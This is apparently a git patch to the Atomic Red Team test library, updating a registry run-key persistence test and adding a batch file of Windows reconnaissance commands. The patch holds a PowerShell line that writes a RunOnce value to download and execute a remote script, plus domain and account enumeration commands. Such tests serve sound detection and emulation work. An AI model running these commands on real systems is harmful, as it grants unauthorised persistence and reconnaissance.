From 08f1fdcc2b4d350d975d9f481b29815cf9585e2e Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Mon, 13 Mar 2023 12:40:49 -0600 Subject: [PATCH] use ART repo instead of ARTifacts (#2361) * use ART repo instead of ARTifacts * typo fix --- atomics/T1547.001/T1547.001.yaml | 5 ++-- atomics/T1547.001/src/Discovery.bat | 44 +++++++++++++++++++++++++++++ 2 files changed, 47 insertions(+), 2 deletions(-) create mode 100644 atomics/T1547.001/src/Discovery.bat diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml index 696b3681..92b7f610 100644 --- a/atomics/T1547.001/T1547.001.yaml +++ b/atomics/T1547.001/T1547.001.yaml @@ -59,7 +59,7 @@ atomic_tests: executor: command: | $RunOnceKey = "#{reg_key_path}" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"' cleanup_command: | Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore name: powershell @@ -106,7 +106,8 @@ atomic_tests: - name: Suspicious bat file run from startup Folder auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e description: | - bat files can be placed in and executed from the startup folder to maintain persistance. + bat files can be placed in and executed from the startup folder to maintain persistance + Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. supported_platforms: diff --git a/atomics/T1547.001/src/Discovery.bat b/atomics/T1547.001/src/Discovery.bat new file mode 100644 index 00000000..46677d8d --- /dev/null +++ b/atomics/T1547.001/src/Discovery.bat @@ -0,0 +1,44 @@ +net user Administrator /domain +net Accounts +net localgroup administrators +net use +net share +net group "domain admins" /domain +net config workstation +net accounts +net accounts /domain +net view +sc.exe query +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices +reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify +reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit +reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell +reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell +reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run +wmic useraccount list +wmic useraccount get /ALL +wmic startup list brief +wmic share list +wmic service get name,displayname,pathname,startmode +wmic process list brief +wmic process get caption,executablepath,commandline +wmic qfe get description,installedOn /format:csv +arp -a +whoami +ipconfig /displaydns +route print +netsh advfirewall show allprofiles +systeminfo +qwinsta +quser